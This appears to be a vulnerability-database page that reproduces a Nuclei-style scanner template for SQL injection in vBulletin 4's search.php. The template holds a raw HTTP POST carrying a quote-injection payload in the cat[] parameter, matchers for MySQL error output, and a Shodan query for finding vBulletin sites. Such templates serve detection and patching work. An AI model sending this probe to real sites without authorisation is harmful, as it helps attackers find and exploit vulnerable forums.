漏洞描述
vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server.
vbulletin-search-sqli: vBulletin `Search.php` - SQL Injection
PoC代码[已公开]
id: vbulletin-search-sqli
info:
name: vBulletin `Search.php` - SQL Injection
author: MaStErChO
severity: high
description: |
vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server.
remediation: Upgrade to the latest version of vBulletin.
reference:
- https://www.exploit-db.com/exploits/17314
- https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/
classification:
cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: vbulletin
product: vbulletin
shodan-query: http.component:"vBulletin"
tags: vbulletin,sqli,vuln
http:
- raw:
- |
POST /search.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: body
words:
- "type=dberror"
- "MySQL Error"
condition: and
- type: status
status:
- 200
- 503
condition: or
# digest: 4a0a00473045022074303121ed83ffe45c64bf8087374aa3e11a47f74e6198873ff9af48fc1ba20d0221009c17569f48b8cdef89f9faabf1a9bf56eb990edf3fe779131176e282bccb94fd:922c64590222798bb761d5b6d8e72950